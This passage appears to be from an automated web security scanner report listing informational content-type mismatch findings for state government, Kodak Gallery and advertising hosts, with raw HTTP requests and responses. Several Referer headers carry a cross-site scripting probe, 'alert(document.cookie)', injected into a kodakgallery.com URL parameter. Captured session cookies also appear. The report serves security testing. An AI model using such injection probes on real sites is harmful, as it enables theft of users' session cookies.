Cookie: JSESSIONID=CC4CD27F387886491A0AF28102E7A11F.lono; __utma=180588659.1320072404.1304201425.1304201425.1304201425.1; __utmb=180588659; __utmc=180588659; __utmz=180588659.1304201425.1.1.utmccn=(referral)|utmcsr=hawaii.gov|utmcct=/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:01 GMT
Server: Apache-Coyote/1.1
ETag: W/"2077-1283504224000"
Last-Modified: Fri, 03 Sep 2010 08:57:04 GMT
Content-Type: text/css
Content-Length: 2077
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


<!-- style sheet -->
<!-- 2.1.6 Friday, August 10, 2001 10:09:24 PM added times --><!-- Friday, August 24, 2001 1:55:39 PM added left and right -->
<style type="text/css">
<!--
body, td, p { font-siz
...[SNIP]...

30.169. https://dotax.ehawaii.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://dotax.ehawaii.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: dotax.ehawaii.gov
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=180588659.1320072404.1304201425.1304201425.1304201425.1; __utmb=180588659; __utmc=180588659; __utmz=180588659.1304201425.1.1.utmccn=(referral)|utmcsr=hawaii.gov|utmcct=/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:48 GMT
Server: Apache/2.2
Last-Modified: Fri, 15 Jan 2010 06:35:02 GMT
ETag: "31f62c-57e-47d2e340bd180"
Accept-Ranges: bytes
Content-Length: 1406
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

..............h.......(....... ...................................sgF...s...u...y.......................................................................................................................
...[SNIP]...

30.170. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://egov.dnrec.delaware.gov
Path:   /egovpublic/dnrec/disp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /egovpublic/dnrec/disp HTTP/1.1
Host: egov.dnrec.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 30 Apr 2011 12:20:03 GMT
Server: Apache/2.2.0 (Fedora)
Surrogate-Control: no-store
$WSEP:
Set-Cookie: JSESSIONID=0000i5hwqBmEjB1A7BDb_F_urhk:1414d4ncb; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 12
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

Error 500:

30.171. http://feeds.feedburner.com/~s/kansasgovwhatsnew  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://feeds.feedburner.com
Path:   /~s/kansasgovwhatsnew

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /~s/kansasgovwhatsnew HTTP/1.1
Host: feeds.feedburner.com
Proxy-Connection: keep-alive
Referer: http://www.kansas.gov/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=UTF-8
Date: Sat, 30 Apr 2011 11:13:00 GMT
Expires: Sat, 30 Apr 2011 11:13:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 4

null

30.172. http://ga.gov/gta/images/webpage/link_icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ga.gov
Path:   /gta/images/webpage/link_icon.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /gta/images/webpage/link_icon.gif HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/channel_title/0,2094,4802_13167990,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87; vgnvisitor=2w45tg00s3c00001jrJkq8F01b; s_vnum=1306715774545%26vn%3D1; s_cc=true; s_nr=1304123790219; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:07:37 GMT
Server: Apache/1.3.29 (Unix)
Last-Modified: Wed, 10 Oct 2007 20:58:23 GMT
ETag: "1d31-114-470d3cef"
Accept-Ranges: bytes
Content-Length: 276
Content-Type: image/gif

.PNG
.
...IHDR......
.....X0$.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...0PLTEvyuhsi............y........tsk...xmo...ilg.......M.<....tRNS......................OIDATx.\M[..0....>...wt_
...[SNIP]...

30.173. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_878.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ipinvite.iperceptions.com
Path:   /Invitations/Javascripts/ip_Layer_Invitation_878.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /Invitations/Javascripts/ip_Layer_Invitation_878.aspx HTTP/1.1
Host: ipinvite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Sat, 30 Apr 2011 15:07:51 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-Srv-by: INVAI01
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 351

var _http = document.location.protocol;var gLink = _http +'//ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_878.js';var script = document.createElement('script'); script.setA
...[SNIP]...

30.174. http://johncarney.house.gov/profiles/house/themes/house/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://johncarney.house.gov
Path:   /profiles/house/themes/house/images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /profiles/house/themes/house/images/favicon.ico HTTP/1.1
Host: johncarney.house.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 15 Apr 2011 00:26:23 GMT
ETag: "26f592-cbe-4a0ea177249c0"
Accept-Ranges: bytes
Content-Length: 3262
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=86400
Expires: Sun, 01 May 2011 00:38:53 GMT
Date: Sat, 30 Apr 2011 00:38:53 GMT
Connection: close

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

30.175. http://kdkgllry.netmng.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kdkgllry.netmng.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?aid=195 HTTP/1.1
Host: kdkgllry.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CaX1f%2BX%2FH0XmnewULrgjFuBdyNO5Bfd3pDQ5D3BffaKygm7dWhxyfMeptI88DhCWPCMieuKmcL2x7c%2BH19wRjGU6WMC%2Fj5YTTPSS3NzPOIqDufmtYKfD%2Fi7sByDhAGs4OaaGcL4fkM8ToE%2B1SbyyQPiv4JgRuJqgqvzAT0PhUc2Qq%2FA2FuWNxwCQiehpdqupOwMrOGkuNMKcb6Y%2BAaCdn6sjXowEdBlDwqn1M5yyByn0Mo2yD2HaLuUD5MWy4CYKI6X7QwffnTgfB6NG4hGmbw6tDbDL4x7rpuRd4CBCv9vA%3D

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:08:18 GMT
Server: Apache/2.2.9
P3P: policyref="http://kdkgllry.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 28 Apr 2011 15:08:18 GMT
Last-Modified: Thu, 28 Apr 2011 15:08:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=z2r8aytrpwakd%7CCTvIgdEfUb%2F9H0h1IG38d1tn%2BRDKtRvPJHr%2F4JbkUcJaLDzz3yKCVJRWJJZ3OdFCrEUa2%2BL0P3gBIzFh22vC0k4yj17hP8pDj%2BTAfvBIpBoSHiic4MgkNLd9vkgQEVSQZWApasK%2BWaqI5A%2Fa0%2Ba27%2Bl4R7r4AMAWBAv4nPkbYKg7Jup%2Bh9SLxhC5EX8Xs9A1W2%2BYk58LvGr7ybFr1Fv22Lx1%2BprOhpordmXze4uipLrF7jKamjQQMIVdULuDCGjMEidtz9ntZaDzB27ApAMkrnxu0BuWDBMwST1wWX%2BHJpmdilKLYsgFPIgs0U5uwfyDwSmlHQk7f0ZS9h%2BYwqFnSg%3D%3D; expires=Sun, 30-Oct-2011 15:08:18 GMT; path=/; domain=.netmng.com
Content-Length: 1013
Connection: close
Content-Type: text/html; charset=UTF-8


var i=document.createElement('IMG'); i.src='http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=netmining=global_AOL[72]&betq=9772=414055[72]'; i.width=1; i.height=1; i.border=0; i.vsp
...[SNIP]...

30.176. http://kentucky.gov/_layouts/Authenticate.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kentucky.gov
Path:   /_layouts/Authenticate.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /_layouts/Authenticate.aspx HTTP/1.1
Host: kentucky.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=210812687.1304123849.1.1.utmcsr=ky.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=210812687.1043360039.1304123849.1304123849.1304123849.1; __utmc=210812687; ASP.NET_SessionId=hezkkenjluypv0y4tpqmwn55; __utmb=210812687.2.10.1304123849;

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 30 Apr 2011 12:21:46 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: NTLM
MicrosoftSharePointTeamServices: 12.0.0.6514
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16

401 UNAUTHORIZED

30.177. http://kodakgallery-kg.baynote.net/baynote/tags3/common  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kodakgallery-kg.baynote.net
Path:   /baynote/tags3/common

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /baynote/tags3/common?customerId=kodakgallery&code=kg&timeout=undefined&onFailure=undefined HTTP/1.1
Host: kodakgallery-kg.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: public,max-age=27800,must-revalidate
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 30 Apr 2011 15:08:24 GMT
Content-Length: 77363


                           baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc
...[SNIP]...

30.178. http://kodakimagingnetworki.tt.omtrdc.net/m2/kodakimagingnetworki/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kodakimagingnetworki.tt.omtrdc.net
Path:   /m2/kodakimagingnetworki/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/kodakimagingnetworki/mbox/standard?mboxHost=www.kodakgallery.com&mboxSession=1304176122561-938029&mboxPage=1304176122561-938029&screenHeight=1200&screenWidth=1920&browserWidth=998&browserHeight=935&browserTimeOffset=-300&colorDepth=16&mboxCount=2&sourceId=700019816903&mbox=LandingPageMbox&mboxId=0&mboxTime=1304158124644&mboxURL=http%3A%2F%2Fwww.kodakgallery.com%2Fgallery%2Flp%2F2010%2Fvisit_florida%2Fvacation_photos.jsp%3Fe81c7*%2Falert(document.cookie)%2F%2F4c687dfaa6f%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F43&mboxVersion=40 HTTP/1.1
Host: kodakimagingnetworki.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 170
Date: Sat, 30 Apr 2011 15:08:21 GMT
Server: Test & Target

mboxFactories.get('default').get('LandingPageMbox',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1304176122561-938029.17");

30.179. http://landmark-project.com/feed2js/feed2js.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://landmark-project.com
Path:   /feed2js/feed2js.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /feed2js/feed2js.php HTTP/1.1
Host: landmark-project.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:21:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Content-Length: 637
Connection: close
Content-Type: text/html; charset=UTF-8

document.write('<div class="rss-box">');
document.write('<p class="rss-item"><em>Error:</em> Feed failed! Causes may be (1) No data found for RSS feed http://landmark-project.com/feed2js/nosource.php
...[SNIP]...

30.180. http://maps.google.com/maps/api/js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.google.com
Path:   /maps/api/js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=cMOTWQGkXQrk7nh54pMJ1zQ_ycsNxj0VXcwHDPJp-lB7ImooFb9JoLuGI39McEZosntJPHUik-1OWZ3xy9chGAc15L9QJMcDt-OTMQ2hNhjOnw17Fu6WntRqrZ3m-gf4; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Language
Date: Sat, 30 Apr 2011 12:22:16 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Connection: close

alert("The Google Maps API server rejected your request. The \x22sensor\x22 parameter specified in the request must be set to either \x22true\x22 or \x22false\x22.")

30.181. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fkentucky.gov%2FPages%2Fhome.aspx&callback=_xdc_._tgkwur&token=3823 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://kentucky.gov/Pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 30 Apr 2011 00:37:18 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._tgkwur && _xdc_._tgkwur( [1] )

30.182. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/ViewportInfoService.GetViewportInfo

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /maps/api/js/ViewportInfoService.GetViewportInfo?1m6&1m2&1d-90&2d-3.14453125&2m2&1d90&2d163.14453125&2u3&4sen-US&5e0&callback=_xdc_._73y626&token=15751 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 30 Apr 2011 11:23:05 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4488

_xdc_._73y626 && _xdc_._73y626( ["Map data ..2011 Europa Technologies, Geocentre Consulting, Tele Atlas, Whereis(R), Sensis Pty Ltd",[["obliques",[[40.97989806962013,0],[55.77657301866769,22.5]]],["ob
...[SNIP]...

30.183. http://mi.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mi.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: mi.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:34:06 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 11 Dec 2004 08:15:42 GMT
ETag: "1a1c-57e-ad620780"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: public, max-age=86400
Content-Type: text/plain

..............h.......(....... ................................................x...Z...<..........................o.o.W.W.@.@..................w...Z...=... ..........s...d...U...F.o.7.W.(.@...........
...[SNIP]...

30.184. http://mi.gov/images/som/governor_309187_7.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mi.gov
Path:   /images/som/governor_309187_7.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/som/governor_309187_7.gif HTTP/1.1
Host: mi.gov
Proxy-Connection: keep-alive
Referer: http://mi.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:26:55 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 01 Jan 2011 16:44:50 GMT
ETag: "148064-9a8d-a3290480"
Accept-Ranges: bytes
Content-Length: 39565
Cache-Control: public, max-age=86400
Content-Type: image/gif

......Exif..II*.................Ducky.......d.....)http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

30.185. http://mibid.bidcorp.com/Auctions/Files/Auction_28057/thumbnail/car1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mibid.bidcorp.com
Path:   /Auctions/Files/Auction_28057/thumbnail/car1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Auctions/Files/Auction_28057/thumbnail/car1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mibid.bidcorp.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 27623
Content-Type: image/jpeg
Last-Modified: Fri, 22 Apr 2011 19:17:10 GMT
Accept-Ranges: bytes
ETag: "dcaf10e1211cc1:11ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:32:00 GMT

.PNG
.
...IHDR.......:......ws.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs..4...3...|9...kPIDATx^].w.UU..[...6.S.U.P9..s.."..3.H........I.DQ.EA@@    ..@L.}.......{
...[SNIP]...

30.186. http://mibid.bidcorp.com/Auctions/Files/Auction_28059/thumbnail/img_1345.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mibid.bidcorp.com
Path:   /Auctions/Files/Auction_28059/thumbnail/img_1345.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Auctions/Files/Auction_28059/thumbnail/img_1345.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mibid.bidcorp.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 48624
Content-Type: image/jpeg
Last-Modified: Mon, 25 Apr 2011 14:06:09 GMT
Accept-Ranges: bytes
ETag: "a6531eed513cc1:11ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:32:01 GMT

.PNG
.
...IHDR.......`......bX.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs..)q..(....}....YIDATx^l.u|.....:0...}.ip.mf.l..lYF.dff...23.,ff&333c3$..I&.I2.~.)i...
...[SNIP]...

30.187. http://mibid.bidcorp.com/Auctions/Files/Auction_28060/thumbnail/img_1353.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mibid.bidcorp.com
Path:   /Auctions/Files/Auction_28060/thumbnail/img_1353.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Auctions/Files/Auction_28060/thumbnail/img_1353.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mibid.bidcorp.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 47289
Content-Type: image/jpeg
Last-Modified: Mon, 25 Apr 2011 14:25:08 GMT
Accept-Ranges: bytes
ETag: "663a5094543cc1:11ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:32:02 GMT

.PNG
.
...IHDR.......i......m    .....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs...7..-....h...."IDATx^e.Ut\.......{|U...f[...m.eI..d.......Qf.e.....L..yN..../.G....
...[SNIP]...

30.188. http://mibid.bidcorp.com/Auctions/Files/Auction_28061/thumbnail/img_1354.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mibid.bidcorp.com
Path:   /Auctions/Files/Auction_28061/thumbnail/img_1354.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Auctions/Files/Auction_28061/thumbnail/img_1354.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mibid.bidcorp.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 74371
Content-Type: image/jpeg
Last-Modified: Mon, 25 Apr 2011 15:27:06 GMT
Accept-Ranges: bytes
ETag: "b8b43c3c5d3cc1:11ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:32:02 GMT

.PNG
.
...IHDR.............Nu......sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs...............yIDATx^\..|.W....uf...'!...    ..B.........]
.)R.B[..B.{;u{..zi...o:.srr
...[SNIP]...

30.189. http://mibid.bidcorp.com/Auctions/Files/Auction_28079/thumbnail/m3493a.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mibid.bidcorp.com
Path:   /Auctions/Files/Auction_28079/thumbnail/m3493a.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Auctions/Files/Auction_28079/thumbnail/m3493a.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
